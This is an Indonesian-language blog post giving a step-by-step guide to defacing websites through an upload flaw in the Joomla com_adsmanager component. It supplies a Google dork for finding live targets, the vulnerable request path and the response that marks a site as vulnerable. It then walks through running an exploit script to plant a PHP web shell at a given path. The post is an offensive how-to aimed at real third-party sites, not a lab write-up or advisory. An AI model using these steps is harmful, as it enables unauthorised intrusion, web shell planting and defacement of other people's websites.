Deface dengan Joomla Com_Adsmanager

Deface dengan Joomla Com_Adsmanager

Hello, ketemu lagi sama ane , belakangan ini pada nyari 'Exploit Joomla Com_Adsmanager' katanya sih Private, iyaa emang Private, yaudah ane cari cari ehh gatau nya mirip Wordpress Themes Konzept :v tapi berhubung udah ada yang Share duluan yaudah ini ane Share juga :D
Langsung aja cekibrot, Bahan bahannya:
▐ Dork: inurl:/index.php?option=com_adsmanager site: Use Your Brain!
▐ Xampp 
▐ Exploit Com_Adsmanager

Instal dulu Xampp nya.
Cari target menggunakan Google Dork, kalo udah ketemu kasih Exploit ini di akhir Url nya, /index.php?option=com_adsmanager&task=upload&tmpl=component , jadi http://localhost/index.php?option=com_adsmanager&task=upload&tmpl=component kalo Vuln responnya {"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_RandomNumber"}Ex: {"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_16"}

Langsung exksekusi, Copykan Exploit Com_Adsmanager ke notepad ganti http://localhost/ dengan target ente kalo ada path nya sekalian path nya :v Shell.jpg/.php ganti dengan nama shell ente save dengan ekstensi PHP, kalo udah buka Xampp, masukin Command cd C:\Xampp\php lalu masukan lagi command php exploit.php ex: php ads.php lalu enter.

Respon jika shell udah ke upload, {"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "shell.php"}
akses Shell http://localhost/tmp/plupload/shell.php

• Tweet
• Share
• Share
• Share
• Share

About Admin

This is dummy text. It is not meant to be read. Accordingly, it is difficult to figure out when to end it. But then, this is dummy text. It is not meant to be read. Period.

Related Post